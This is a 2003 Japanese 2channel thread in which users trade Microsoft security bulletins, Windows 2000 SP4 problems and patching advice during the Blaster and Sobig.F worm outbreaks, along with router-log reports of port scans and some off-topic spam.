Windows 2000 Service Pack 4 を適用することでこの問題を解消することができます。


517窓板住人 ◆winDOwS0aE :03/07/16 05:53 ID:???
Windows2000 SP4 関連トラブル

バーチャルネットハッカーっ娘 沙耶16歳 - Win2000 SP4の罠
http://saya.c-moon.jp/index.php?d=200307-A&cid=7-01#7-01
イ奄の中の人さん:我慢できず入れちゃって不安定。更新もままならないそうです。
電脳御殿さん(日記2003/7/4分):かつてからUSBまわりに不具合があったが、結局解決せず。
hidakaさん(2003/7/3〜4): HDDとびました…。
(7/12追記)雛姫さん:ブートしなくなりました→SafeModeで起動してアンインストールでなんとか復活

NTBUGTraq
SP4 - memory parity errors reported? (F0 0F bug style)
http://archives.neohapsis.com/archives/ntbugtraq/2003-q3/0001.html
Alexa Adware in W2K SP4
http://archives.neohapsis.com/archives/ntbugtraq/2003-q3/0006.html

セキュリティホールmemo
http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2003/07.html#20030707_w2ksp4
「以前に問題起こさなかったフォームを開こうとすると、メモリ不足というメッセージと、
C++ランタイムエラーを発生させる事態を見つけました。」
518記者風野郎 ◆keO78YJbfs :03/07/17 08:29 ID:???
Windowsに新たな「緊急」の脆弱性
http://www.zdnet.co.jp/enterprise/0307/17/epn02.html

「MS03-026: RPC インターフェイスのバッファ オーバーランによりコードが実行される (823980)」に関する要約情報
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/MS03-026ov.asp
519名無しさん@お腹いっぱい。:03/07/17 11:12 ID:???
「MS03-027: Windows シェルの未チェックのバッファによりシステムが侵害される (821557)」に関する要約情報
http://www.microsoft.com/japan/technet/security/bulletin/MS03-027ov.asp

「MS03-028: ISA Server のエラー ページの問題により、クロスサイト スクリプティング攻撃が実行される (816456)」に関する要約情報
http://www.microsoft.com/japan/technet/security/bulletin/MS03-028ov.asp
520あぼーん:あぼーん
あぼーん
521名無しさん@お腹いっぱい。:03/07/17 22:09 ID:???
昨日、アップデートしたばかりなのですが本日>>518>>519を発見しました。

32 bit Edition
64 bit Edition
これ
自分のバージョン情報を見ると32でも64bitでもないのですが
WindowsUpdateで特に更新するものはありませんという表示がでれば
それでいいのですよね?よくわからなくて。


522名無しさん@お腹いっぱい。:03/07/17 22:33 ID:???
32bitをいれておけ
523521:03/07/18 08:03 ID:???
>>522
遅レスですみません。サンクスです。
524名無しさん@お腹いっぱい。:03/07/18 22:57 ID:???
サウンドブラスターliveの最新デバイスをインストールしたら、
devldr32関連で窓が終了できなくなりました。
で、そのときにウイルスバスターも反応。
ウイルス検索をしてもウイルス見つからないし・・・
過去ログに「devldr32」についての話題が少しありましたが、
ウイルスではなくドライバ関連なのでしょうか?
525記者風野郎 ◆keO78YJbfs :03/07/19 00:18 ID:bi+6s2tU
IE6 SP1にファイルがダウンロードできない問題が発覚
http://pcweb.mycom.co.jp/news/2003/07/18/28.html

対象となる環境は、IE 6.0 SP1をインストールしているWindows 98SE/Me/2000 SP2、SP3/XP、XP SP1/NT 4.0 SP6a。

  _, ,_
 ( ´_ゝ`)
526名無しさん@お腹いっぱい。:03/07/20 20:29 ID:???
嫌な話だな。
527窓板住人 ◆winDOwS0aE :03/07/21 14:11 ID:???
Windowsとは全く関係ありませんが、おたくのCiscoルータ/スイッチの
IOSのアップデートはご確認済みでしょうか。

■ Cisco Security Advisory: Cisco IOS Interface Blocked by IPv4 Packet
http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2003/07.html#20030717_cisco
Cisco IOS を塔載した Cisco ルータおよびスイッチに欠陥。 IPv4 を処理するよう設定されている場合
(ふつうは設定されてるだろう)、稀な一連の IPv4 パケット (A rare sequence of crafted IPv4 packets) を
直接ルータ/スイッチに送ると、その結果、その入力インターフェイスにおける処理が停止、
使用不能攻撃が成立する。これは reboot させないと直らない。

exploitがすでに出てます。ご確認されることを推奨します。
528名無しさん@お腹いっぱい。:03/07/24 00:28 ID:???
(^_^)Windowsのパスワードを僅か数秒で解読

http://headlines.yahoo.co.jp/hl?a=20030723-00000008-cnet-sci

Microsoftがパスワードをエンコードするやり方には、いつくかの弱点があり、
このような解読テクニックをとりわけ有効なものにしてしまう.

529名無しさん@お腹いっぱい。:03/07/24 00:48 ID:???
>>528
つまりエンコードしたパスワード、UNIXで言う/etc/passwdの内容が有れば
ランダムな文字列でも数秒で解読する事ができるって事かな?
530記者風野郎 ◆keO78YJbfs :03/07/24 10:16 ID:???

DirectXに「緊急」の脆弱性
http://www.zdnet.co.jp/enterprise/0307/24/epn03.html

「MS03-030: DirectX の未チェックのバッファにより、コンピュータが侵害される (819696)」
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/MS03-030ov.asp
531名無しさん@お腹いっぱい。:03/07/24 10:30 ID:???
Windows2000ユーザーです。

先ほどwindowsUpdateしたらDirectX9.0bがインストールされました。
公式逝ってもDirectX9.0aしかなかったので一応(怖いので)お知らせしときます
532名無しさん@お腹いっぱい。:03/07/24 10:41 ID:???
ってさっきUpdeteしたのにまたUpdateかよ!
533名無しさん@お腹いっぱい。:03/07/24 10:56 ID:???
Updete
534名無しさん@お腹いっぱい。:03/07/24 12:05 ID:???
>>533
つっこむな
535名無しさん@お腹いっぱい。:03/07/24 12:15 ID:ClG/7QjB
インターネット業界トラブルニュースさん、ある通信社から著作権侵害とのクレームを受け閉鎖
http://www.geocities.co.jp/SiliconValley-SanJose/1394/
536名無しさん@お腹いっぱい。:03/07/24 13:07 ID:???
◆WindowsのDirectXに「緊急」のセキュリティ・ホール,すべてのユーザーが影響

◆SQL Serverにも「重要」のセキュリティ・ホール

http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030724/1/
537ぼるじょあXターボ ◆bUcU4CKAtk :03/07/24 16:03 ID:Bl+/LOCj
538名無しさん@お腹いっぱい。:03/07/24 17:11 ID:???
「MS03-029: Windows の機能の問題により、サービス拒否が起こる (823803)」に関する要約情報です。
http://www.microsoft.com/japan/technet/security/bulletin/MS03-029ov.asp

「MS03-031: Microsoft SQL Server 用の累積的な修正プログラム (815495)」に関する要約情報です。
http://www.microsoft.com/japan/technet/security/bulletin/MS03-031ov.asp
539窓板住人 ◆winDOwS0aE :03/07/24 19:17 ID:???
WIndowsとはそんなに関係ないですが、CGIでよく使われるらしい
スクリプト、CGI.pmにクロスサイトスクリプティング脆弱性があるようです。
CGI 職人、あるいはCGI使われている方々は最新のバージョンに
アップデートすることを推奨します。

http://archives.neohapsis.com/archives/bugtraq/2003-07/0267.html
540名無しさん@お腹いっぱい。:03/07/27 00:09 ID:???
★またも相次ぐMS発のセキュリティ警告★

http://www.zdnet.co.jp/enterprise/0307/24/epn06.html

中には、大半のWindowsマシンに影響する最大深刻度「緊急」の脆弱性が含まれる。
541名無しさん@お腹いっぱい。:03/07/27 02:54 ID:???
元荒らし「自衛隊のFLASH観察」住人監視所
http://tmp.2ch.net/test/read.cgi/tubo/1059039798/138
542名無しさん@お腹いっぱい。:03/07/28 01:04 ID:???

MSもセキュリティーホール総合情報ページを公開!?

http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030725/1/

  なんだかなー
543名無しさん@お腹いっぱい。:03/07/29 09:10 ID:???
さすらいおはよう(ワラ
テルクノはるのくんホストクラブ言ってみ(ワラ
544窓板住人 ◆winDOwS0aE :03/08/01 05:28 ID:???
http://memo.st.ryukoku.ac.jp/archive/200307.month/6243.html
Windows 2000 SP4 -> IE6SP1 の順にインストールすると cryptdlg.dll が
ダウングレードするというのを確認してます。しかし、HFNetChk は検出
しません。


だそうです。要注意。
545あぼーん:あぼーん
あぼーん
546名無しさん@お腹いっぱい。:03/08/02 20:26 ID:???
age
547あぼーん:あぼーん
あぼーん
548名無しさん@お腹いっぱい。:03/08/06 00:39 ID:???

/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
| ほう、Proxy 検索スクリプトで 2ch で自作自演ですか?

   ̄ ̄ ̄|/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
  ∧_∧       / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
  ( ・∀・)  ∧ ∧ < な、なんですか。あなたは!
 (  ⊃ )  (゚Д゚;)  \____________
 ̄ ̄ ̄ ̄ ̄ (つ_つ__
 ̄ ̄ ̄日∇ ̄\| BIBLO |\
        ̄   =======  \

http://pc2.2ch.net/test/read.cgi/php/1060009605/368-

368 名前:nobodyさん sage 03/08/05 (火) 22:28 ID:???
取り敢えずできました。物が物だけに、アレなので
2:00にデリします。

↑なんか、かなりのスクリプト公開&開発してるらしい
549名無しさん@お腹いっぱい。:03/08/11 22:55 ID:???
保守しておくか。
550窓板住人 ◆winDOwS0aE :03/08/12 20:03 ID:???
【緊急】Windows RPCの脆弱性狙ったワームが拡散を開始 8/12
http://news2.2ch.net/test/read.cgi/newsplus/1060648014/
【ネット】「ぬるぽ」 Winnyで広がるワームが出現 ★2 [8/9]
http://news2.2ch.net/test/read.cgi/newsplus/1060611700/
551名無しさん@お腹いっぱい。:03/08/13 23:11 ID:30QV0O7Z
【セキュリティ】ウイルス「Blaster」 警察のコンピュータにもアクセス1万件
http://news2.2ch.net/test/read.cgi/newsplus/1060781039/
552あぼーん:あぼーん
あぼーん
553あぼーん:あぼーん
あぼーん
554あぼーん:あぼーん
あぼーん
555あぼーん:あぼーん
あぼーん
556名無しさん@お腹いっぱい。:03/08/16 06:48 ID:???
保守
557名無しさん@お腹いっぱい。:03/08/16 08:32 ID:???
超ガイシュツとは思うけど一応カキコしときます。

図まで入って開設されています。
素人さんでも、これ見れば一発ですね。
http://www.microsoft.com/japan/technet/security/virus/blaster.asp
558名無しさん@お腹いっぱい。:03/08/16 09:55 ID:DqGgWjB7
>>557
しかし・・・コネクターの抜き方まで解説してある。

コレ見ても「わかんな〜い♪」だったらネット止めれ・・・
559名無しさん@お腹いっぱい。:03/08/16 09:57 ID:C7ZC/rmx
win2000のパッチファイル
Windows2000-KB823980-x86-JPN
は、sp3があたってないと無効なのですか?

560名無しさん@お腹いっぱい。:03/08/16 10:00 ID:0TiNbiwY
Windows Updateするだけじゃだめなの?
561名無しさん@お腹いっぱい。:03/08/16 10:03 ID:C7ZC/rmx
updしないで、
Windows2000-KB823980-x86-JPN
をあてるだけはだめなの?
updは時間かかるので・・・・
100台世話してんのよ
562名無しさん@お腹いっぱい。:03/08/16 10:08 ID:iBq92Lb0

誰か ウィルス持ってなーい
      
          upしてー
563名無しさん@お腹いっぱい。:03/08/16 10:21 ID:DqGgWjB7
>>560
>557 見れ
564名無しさん@お腹いっぱい。:03/08/16 10:28 ID:C7ZC/rmx
>563
あんがと・・・
でも 「SP4適用・・・」だったらpatchあてる必要ないんじゃないかな
sp4は026対応でしょ

Windows 2000 をお使いの場合は、Serverce Pack 2、Service Pack 3
または 4 を適用する必要があります。
Service Pack は、以下から入手可能です。
できる限り最新の Service Pack を適用することをお勧めします。

565あぼーん:あぼーん
あぼーん
566名無しさん@お腹いっぱい。:03/08/16 11:11 ID:0TiNbiwY
あーめんどくさい
567名無しさん@お腹いっぱい。:03/08/16 11:45 ID:???
さっきから、WindowsUpdateからのアクセスが凄いんですけど。
確認したら「重要な更新はありません」。
小さい更新(?)もしろよー!って事じゃないよね?
568あぼーん:あぼーん
あぼーん
569名無しさん@お腹いっぱい。:03/08/16 12:08 ID:0TiNbiwY
じゃないってことにしとこう
570名無しさん@お腹いっぱい。:03/08/16 12:30 ID:???
571あぼーん:あぼーん
あぼーん
572あぼーん:あぼーん
あぼーん
573名無しさん@お腹いっぱい。:03/08/16 13:37 ID:???
574名無しさん@お腹いっぱい。:03/08/16 13:52 ID:C7ZC/rmx
>573
あんがと
これみると、sp4っていったい何なの・・・・
win2000の最終っていうか、かんぺきバージョンは、
sp4+(>573の修正patchぜ〜んぶ)っていう事かな
これやってらんないよ
575名無しさん@お腹いっぱい。:03/08/16 13:54 ID:C7ZC/rmx
sp4+(>573の修正patchぜ〜んぶ)って
みんな知ってるのかな、知らないの漏れだけ
576名無しさん@お腹いっぱい。:03/08/16 14:05 ID:???
>>574=575
Service PackとHotfixの役割の違いはアナウンスされているはずだが。

あと、SP4のあとにWindows Updateすりゃいいだけなんだから、
別にやってられないなんてこともねーだろ。
個別に落とすにしても、大した量じゃねえよ。
http://www.microsoft.com/japan/enable/products/security/proglist.asp?prod=002&info=5
577名無しさん@お腹いっぱい。:03/08/16 14:08 ID:C7ZC/rmx
100台あるのに、やってられるか!
これ一発でupdっていうのないの?
578窓板住人 ◆winDOwS0aE :03/08/17 02:22 ID:ur0Dq+rq
>>559
マイクロソフト セキュリティ情報 (MS03-026) : よく寄せられる質問
http://www.microsoft.com/japan/technet/security/bulletin/fq03-026.asp

Q.この修正プログラムは Windows 2000 Service Pack 2 でサポートされますか?
A.このセキュリティ修正プログラムは、Windows 2000 Service Pack 2 にインストールすることができます。
しかし、マイクロソフト サポート ライフサイクル ポリシーに従い、このバージョンは現在サポートの対象と
なっておりません。また、このセキュリティ修正プログラムに関しては、Windows 2000 Service Pack 2 上
では最低限のテストのみが行われています。Windows 2000 Service Pack 2 をご使用のお客様は、
できるだけ早期にサポート対象の Service Pack にアップグレードすることを強く推奨します。

Q.MS03-026 の修正プログラムがインストールされていないシステムの存在をネットワーク内でスキャン
するために使用するツールは利用可能ですか?]
A.はい。マイクロソフトは MS03-026 の修正プログラムがインストールされていないシステムの存在を
ネットワーク内でスキャンするために使用するツールをリリースしました。
注意 : このツールは英語版ですが日本語環境でも使用することができます。ただし、ホスト名に
日本語 (MBCS: Multi Byte Character Set) を使用することは出来ません。
このツールに関する追加情報はマイクロソフト サポート技術情報 826369 をご覧ください。
http://support.microsoft.com/default.aspx?scid=kb;ja;826369
579窓板住人 ◆winDOwS0aE :03/08/17 02:34 ID:ur0Dq+rq
>>577
SUS(Software Update Services)などをご検討下さい。
http://www.atmarkit.co.jp/fwin2k/operation/hotfixman/hotfixman_03.html
580名無しさん@お腹いっぱい。:03/08/17 05:15 ID:NOPsgubd

【鶴OFF】広島の平和祈念公園で胴上げ【ぶち壊し】
http://news4.2ch.net/test/read.cgi/news/1061055661/l50
http://off.2ch.net/test/read.cgi/offmatrix/1061063904/
http://jbbs.shitaraba.com/computer/bbs/read.cgi?BBS=4633&KEY=1061058905

胴上げされてたのは「広島へなちょこ ◆Z4C5PzwlT.」←らしいが、
全国の鶴を折ってくれた人、色々協力してくれた人にさえ謝罪する気は無いのか?
581あぼーん:あぼーん
あぼーん
582わらwara藁:03/08/17 09:20 ID:G9JVpvQE
今使っている家のPCはアップデートソフトが入っているのでSPやセキュリティ関係のソフトが
出れば勝手にダウンロードしてくれるが、職場のPCはインターネットにつながらないので全然
していないな。
社内LANの管理者にインターネットに接続できるようにしてほしい、とかけあってみたが
「新しいものは次々出るからきりがない、古い物でも使えれば良いのでは?」と全く理解せず。
こういうPC同士でファイルを交換すると古典的なファイルタイプのウイルスが感染し、
大ダメージ(というより恥)を受けたりしますね。
583あぼーん:あぼーん
あぼーん
584名無しさん@お腹いっぱい。:03/08/17 10:07 ID:9vV9BOsW
会社のPCは、外部には接続できないが、外部からは接続できるという仕組み、
もちルーター越しで壁はあるが、
UPDやHotfixは、各自がserverからDLの指示を出しますが
おじんは何がなんだかわからんようで、まったく何もできないPCも多い
コギャルは即やってくれます。


585あぼーん:あぼーん
あぼーん
586名無しさん@お腹いっぱい。:03/08/17 11:51 ID:RJtmwdfa
XPを使ってますが、修正プログラムは入れたのですが
ほかにブラスターの感染を防ぐためになにかインストールとか
したほうがいいことはありますか?教えてください。
587あぼーん:あぼーん
あぼーん
588あぼーん:あぼーん
あぼーん
589名無しさん@お腹いっぱい。:03/08/17 12:07 ID:???
590名無しさん@お腹いっぱい。:03/08/18 04:46 ID:???
ネットでポート塞いだらイイと書いてあったので、パッチを当てた上でポートも塞いだら、
今度はフォルダを共有できなくなっただのプリンタが使えなくなっただの言い出す奴が、
今日あたりから続出してきそうな悪寒。

591名無しさん@お腹いっぱい。:03/08/18 11:15 ID:???
寒い駄洒落だ。
592名無しさん@お腹いっぱい。:03/08/18 21:58 ID:???
ITPro ニュース:MSがWindows XPのファイアウオールのデフォルト設定を変更へ
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20030818/1/
593名無しさん@お腹いっぱい。:03/08/18 23:49 ID:/IaY5iiW
セキュリティ板で祭り中!
亜種ハケーンの一部始終

msblast対策スレ【ICMP祭り開催中】3日目!
http://pc.2ch.net/test/read.cgi/sec/1061205064/379-
594あぼーん:あぼーん
あぼーん
595名無しさん@お腹いっぱい。:03/08/19 01:32 ID:???
>>586
インターネット接続FWの使用…とか??
ポート135とか弾くようにすればいいかもしれんよ。
596名無しさん@お腹いっぱい。:03/08/19 01:34 ID:???
>ほかにブラスターの感染を防ぐためになにかインストールとか
>したほうがいいことはありますか?教えてください。

パッチ当てたなら、とりあえずそれ以上することは何もない。
597名無しさん@お腹いっぱい。:03/08/19 15:24 ID:KLco4YTu
トレンドでHKTL_DCOM.Y
ってよんでるトロイってどのようなものでしょう・・・?
トレンドのサイトで検索できない(泣
598あぼーん:あぼーん
あぼーん
599はちゃ:03/08/19 17:00 ID:pDRf/Qaz
しかし、いったいどういう人がブラスターに
感染するんですかい
住基ネットに感染する恐れがあるからって
どういう使い方してんだろう
放置状態でさらしておかないと感染せんだろう
600名無しさん@お腹いっぱい。:03/08/19 17:46 ID:T7176qKH
MSから同じ内容のメールが24件届いた・・・。
一体どういうこと?
他に同じ症状が出た人いる?
601あぼーん:あぼーん
あぼーん
602名無しさん@お腹いっぱい。:03/08/19 18:02 ID:???
うちにも嫌がらせメールが8件届きましたよ。
勘弁してくれー
603名無しさん@お腹いっぱい。:03/08/19 18:33 ID:9BMO6+fV
フレッツADSLなんですが、すんげぇ重いんすけどこれも影響? PC使い物にならんし、ISPのサポート見れんし、電話つながらない。 一応対策済み。
604あぼーん:あぼーん
あぼーん
pingいっぱい来やがって、糞重いぞ
やっぱ、亜種ですか
606名無しさん@お腹いっぱい。:03/08/19 19:46 ID:KNFlHjV5
>>600
うちもです。
ウイルスとは関係ないんでしょか?
気になります。
受取拒否にしましたが
607名無しさん@お腹いっぱい。:03/08/19 20:05 ID:???
>>600
メッセンジャーのアップデートしろみたいなヤツ?
メッセンジャーのスレッドそれでいっぱいになってたよ。

そういううちももう20通くらい来てるな。
ええかげんにせい!
608あぼーん:あぼーん
あぼーん
609名無しさん@お腹いっぱい。:03/08/19 20:29 ID:???
>605
俺もping来まくりだよ。
亜種なのか…
610名無しさん@お腹いっぱい。:03/08/19 21:16 ID:MuqG4pL1
>メッセンジャーサービスからのメール大量送信について

今俺も受信トレイ開いてびびった。同士を求め、ここに来たのだが…。
ひどいなマイクロソフト。とうとう狂いだしたか。
611名無しさん@お腹いっぱい。:03/08/19 21:36 ID:???
うちにもping大量に来てる…
FWが抑えてくれるが、かなりウザい。
612あぼーん:あぼーん
あぼーん
613あぼーん:あぼーん
あぼーん
614名無しさん@お腹いっぱい。:03/08/19 22:25 ID:e4NBsMja
McafeeFirewallを使っています。
ここ2,3日以上なくらいping大量に来てるかなりウザい。

615名無しさん@お腹いっぱい。:03/08/19 23:05 ID:???
俺も思わずApacheのログなんか見てみたらwin98IEのUAで大量に来ているよ
616名無しさん@お腹いっぱい。:03/08/19 23:39 ID:Q6ENW9NA
download.Dlucaというウイルスにやられましたが
ノートン先生が駆除してくれません。
winde.exeも削除できません。
どうしたらいいんでしょう。
617名無しさん@お腹いっぱい。:03/08/20 00:30 ID:c+hKCggK
テレフォン♪
618600です:03/08/20 01:13 ID:qEk1Hnl/
>>606
俺も最初に見たときはブラスターか!?
やられた!と思いましたが違うようです。
>>607
そうそう、メッセンジャー云々ってやつですよ。
今、PC立ち上げて再度メールチェックしたら追加で5件も・・・
合計29件の同じメールが来ました。

一体コレは何?MSの嫌がらせですか。
619名無しさん@お腹いっぱい。:03/08/20 03:35 ID:6b1koX2Z
Win2000ですが、HotFixとかSP4とかを入れようとすると、「カタログファイルが
インストールできませんでした」って言われて中断してしまいます。
自分なりに調べて、PCの時計を戻したりロケール情報のレジストリを復活させたり
しましたが、症状変わりません。
もうOSの再インストールしか無いですか?
620名無しさん@お腹いっぱい。:03/08/20 03:45 ID:???
>もうOSの再インストールしか無いですか?
インストール直後のインストールイメージを残していないなら、そうだね。
621名無しさん@お腹いっぱい。:03/08/20 04:33 ID:F8i7ENCJ
約十秒に一回ペースと言う、異常な回数の
ポートスキャンをされているのだが
これはいったい・・・?

ファイヤーウォールで防いではいるが
この異常なまでの頻度、気持ちが悪い
622名無しさん@お腹いっぱい。 :03/08/20 06:24 ID:qBvisTGx
>> 597
あっ、さっき、それ俺も出てきました...

RPC DCOMバッファーオーバーフローを利用したハッキングツールで、
権限を乗っ取られて、何でもやり放題になってしまうらしいっす...

情報を盗まれる恐れがあるので、至急、駆除した方がいいよ...

詳しくは下記を参照
http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=HKTL_DCOM.Y&VSect=T
623名無しさん@お腹いっぱい。:03/08/20 07:40 ID:DMe7hejp
624名無しさん@お腹いっぱい。:03/08/20 08:38 ID:ILpWhLB/
自分とこは98なんで関係ないやと思ったが、
昨日の夜接続したら、数十秒〜数秒1度くらいの異常なペースで
ping刺されまくって痛かったです・・・
そして今もまた十秒1度くらいの割合で来てる

今のところファイアウォールがブロックしているが、
もしかしてネット全体がこんな感じなのか?
もしかして亜種の影響ってヤツなのか?
625名無しさん@お腹いっぱい。:03/08/20 11:54 ID:QthJGgU2
ルータのlogにこんなのあるんですが、やばいんですか?

Unrecognized access from 69.34.51.191:15936 to UDP port 137
Unrecognized access from 151.197.60.145:2283 to TCP port 135
Unrecognized access from 210.153.71.211:2491 to TCP port 135
Unrecognized access from 61.190.141.134:1028 to UDP port 137
Unrecognized access from 138.89.168.162:1028 to UDP port 137
626あぼーん:あぼーん
あぼーん
627あぼーん:あぼーん
あぼーん
628名無しさん@お腹いっぱい。:03/08/20 12:14 ID:Q1b/FAVX
ISDNフレッツです。
頻繁に接続アイコンが青⇒黒になりますが
アタックされまくりでこのような状態なのでしょうか。
誰か教えてください。
629606です:03/08/20 13:16 ID:hEtEFZRM
600さん
違うんですか、安心しました。
どうもありがとう。
630名無しさん@お腹いっぱい。:03/08/20 14:49 ID:???
「ソビッグF」巻いてる 
ハッカーのIP晒します
   
68.83.58.234

危険度S ウィルス クラッシュ  
   
631名無しさん@お腹いっぱい。:03/08/20 15:45 ID:dimBlV54
>>619
SP統合CDを作った上でクリーンインストール。

>>621
俺のルータのログを見ると、135ポートに3回アタックして失敗だったらあきらめているようだ。
632名無しさん@お腹いっぱい。:03/08/20 22:49 ID:???
「windows updateとかしてます?」
「何それ?買ったお店とかに持って行ってやってもらうの?」
「・・・。昨日の夜なんかいっぱいアタックとかありましたね」
「ウイルスなの?それってインターネットで感染するの?
それともメール?」
「・・・」
「俺たまにしかインターネット繋がないしさ。大丈夫でしょ。
パソコンの中にデジカメ画像とかしか入ってないから」

もしネット全く利用しなかったらwindows updateって不要
なんでしょうか?
633名無しさん@お腹いっぱい。:03/08/20 23:04 ID:dimBlV54
>>632
そうだけども、ちょっとでもつなぐことがあるなら、必須。
店頭でウイルス対策CDを無償配布するみたいだし(Yahoo!JAPANでの情報)
、すべての2000/XPユーザを対象にしてはいる模様。
634あぼーん:あぼーん
あぼーん
635あぼーん:あぼーん
あぼーん
636名無しさん@お腹いっぱい。:03/08/20 23:07 ID:ofEIip54
会社のパソコン、ダイヤルアップなんだけど、
RedCodeやスラマーは何もなかったけど
今回のブラスターは影響受けた。
637あぼーん:あぼーん
あぼーん
638名無しさん@お腹いっぱい。:03/08/20 23:47 ID:???
めちゃめちゃ来ているな。ログがMSブラスト系ばっかりになってる。
639名無しさん@お腹いっぱい。:03/08/20 23:51 ID:???
>>623
dクス
640名無しさん@お腹いっぱい。:03/08/21 00:02 ID:FrdjnE1P
isdnは回線が遅いから安心
adslとか光にするからだよ

アナログは安心
641あぼーん:あぼーん
あぼーん
642名無しさん@お腹いっぱい。:03/08/21 00:12 ID:qOJvL9nS
ダイヤルアップでたまにつなぐって言う人、けっこう危ないんじゃないですか。
643名無しさん@お腹いっぱい。:03/08/21 01:00 ID:???
某厚生大臣は、ダイアルうpで感染したんじゃなかったか
644名無しさん@お腹いっぱい。:03/08/21 10:29 ID:???
対策取らず、ネットに繋がってればそのうち感染するだろ。
回線速度は関係ない。
645名無しさん@お腹いっぱい。:03/08/21 19:07 ID:???
自分が時々出入りする初心者BBSで、Blaster騒ぎの後から急に
セキュリティ情報を書き込みするヤシが現れて
それに「さっそく友達にメールします」とかレスがついてるのを見て

今、新しいデマウィルスができたら、簡単に蔓延しそうだなあ

と思った自分の心はすさんでいるのだろうか?
でも、今の、今まで全く何も知らなかったヤシが、にわかに情報を仕入れて
人に教えよううとする状況って、違う意味で危険かもしれないと思う次第。
646名無しさん@お腹いっぱい。:03/08/21 22:26 ID:???
そりゃあ全くそのとおりだな。
セキュリティ意識自体が高まるのは悪いことではないのだが、
教育費がヘンに高くついたりするからなあ。
647名無しさん@お腹いっぱい。:03/08/22 18:57 ID:???
IEに「緊急」の脆弱性、累積パッチリリース
http://www.zdnet.co.jp/enterprise/0308/21/epn02.html

ワームの勢いはとどまらず、今度はSobig.Fの感染拡大
http://headlines.yahoo.co.jp/hl?a=20030822-00000098-myc-sci
トロイの木馬も含む? 日本でも広まるSobig.F
http://www.zdnet.co.jp/enterprise/0308/22/epn08.html

<ブラスター>自治体のウイルス感染拡大 「ウェルチア」も拡大
http://headlines.yahoo.co.jp/hl?a=20030822-00002098-mai-soci
648あぼーん:あぼーん
あぼーん
649あぼーん:あぼーん
あぼーん
650名無しさん@お腹いっぱい。:03/08/23 08:12 ID:???
上の方で「○秒間に○回もping打たれてます、大変です」
なんて言ってる奴いるけど、別に気にする必要ない。
FWやルーター入れてるならなおのこと気にしなくて良い。

F5食らってサーバーがまともに動かなくなったとかならまだしも
個人PCで、ping怖い、ポートスキャン気味悪いとか、ガタガタぬかすな。
651名無しさん@お腹いっぱい。:03/08/23 08:19 ID:H3nUcNhB
ガタガタ・・
652名無しさん@お腹いっぱい。:03/08/23 08:39 ID:ouKuY5Vv
http://tv3.2ch.net/test/read.cgi/geinin/1060061213/541
2ちゃんねるで今度はハイジャック予告
653名無しさん@お腹いっぱい。:03/08/23 15:55 ID:???
>>652
( ゚,_ゝ゚)バカジャネーノ
654名無しさん@お腹いっぱい。:03/08/24 16:35 ID:ScbUeQYG
655名無しさん@お腹いっぱい。:03/08/24 16:48 ID:xxbJ4oF5
656名無しさん@お腹いっぱい。:03/08/24 17:28 ID:RSiUGss3
AUAgent.exe ってなんですか?
657名無しさん@お腹いっぱい。:03/08/25 12:51 ID:Fhh26Dm7
21日にMDACに関するセキュリティーホールが、全部のWindowsに関係するんで、
さらにやりかたによってパッチが当たらないんで、緊急に修正されてから
どうよ?一般には関係することなの?
658名無しさん@お腹いっぱい。:03/08/25 13:03 ID:???
日本語で書いてくれ。
659名無しさん@お腹いっぱい。:03/08/25 13:50 ID:???
>>658
もうちょっとわかりやすく書いてくれ。
660名無しさん@お腹いっぱい。:03/08/25 14:21 ID:6xHxgLKO
661名無しさん@お腹いっぱい。:03/08/25 20:13 ID:PHL7I3AC
テディベアのアイコンを開くな、ってウィルス情報メールが取引先から
来たけど、これってチェーン?
662名無しさん@お腹いっぱい。:03/08/25 20:26 ID:???
>>661
ドラえもんの最終回並に古くて有名なチェーンメール
663名無しさん@お腹いっぱい。:03/08/25 20:45 ID:???
>>662
申し訳なかったです。「jdbgmgr.exe.」で検索かければ一発了解でしたね。
わざわざレス、まことに感謝です。本当に初心者なもので恥ずかしいです!
664名無しさん@お腹いっぱい。:03/08/27 20:03 ID:???
           |ドンドン!!         アヒャーヒャヒャヒャヒャ!!
           |ヾ(゚∀゚)ノ ドンドン!!     アヒャーヒャヒャヒャヒャ!!
  ヒィィィィ        |  (  ) ))       アヒャーヒャヒャヒャヒャ!!
(´Д`;)       |(( < <        アヒャーヒャヒャヒャヒャ!!
(∩∩ノ)         ↑
  ↑       ぽーとすきゃん
 ぱそこん
665名無しさん@お腹いっぱい。:03/08/28 01:28 ID:???
>664
激藁
ってか、笑いが止まんないよ!
666名無しさん@お腹いっぱい。:03/08/28 16:26 ID:ZNlhyHCG
updateで更新をスキャンするをクリックすると、更新をスキャンできないとエラー表示が
出てしまいます。今までちゃんとスキャン出来てたのになぜか判る方
アドバイスお願い致します。
667名無しさん@お腹いっぱい。:03/08/28 21:41 ID:Eo+capJL
Yahoo!のホスト名(IPアドレス)を持ったPCからのアタックがほとんど
ウィルスに感染したPCを繋ぎっ放しにされているのをほっといていいの
ねぇ、孫さん
668名無しさん@お腹いっぱい。:03/08/28 21:47 ID:+8K6vMf7
こんなのあるよ!
http://mishmash.mine.nu/rank
669mdac2.8:03/08/28 22:36 ID:???
670666:03/08/28 23:03 ID:ZNlhyHCG
>>669 早速お返事39です。教えてもらった通りアクセスしましたが
既にインストール済みでした。最終更新は今年の5月位なのでそれ
以来更新出来ません。今きずいた事ですがlive up dateも無いよう
です。いろいろサイトで調べたりしましたが理由は不明です。

今日msのサポートにtelしましたが不通でした。。。
671名無しさん@お腹いっぱい。:03/08/28 23:05 ID:9On6KsgB
田代を一位に!!!!!!!

http://cozalweb.com/ctv/ranking/actor.html

http://www.popkmart.ne.jp/yozemi_ranking/a.html

http://www.no1boy.com/cgi-bin/choice/index.html


管理人が票を削っても、あきらめるな!!

〜コピペ推奨〜
672名無しさん@お腹いっぱい。:03/08/28 23:31 ID:RLCuD0yZ
つまらん。
田代はもういい。
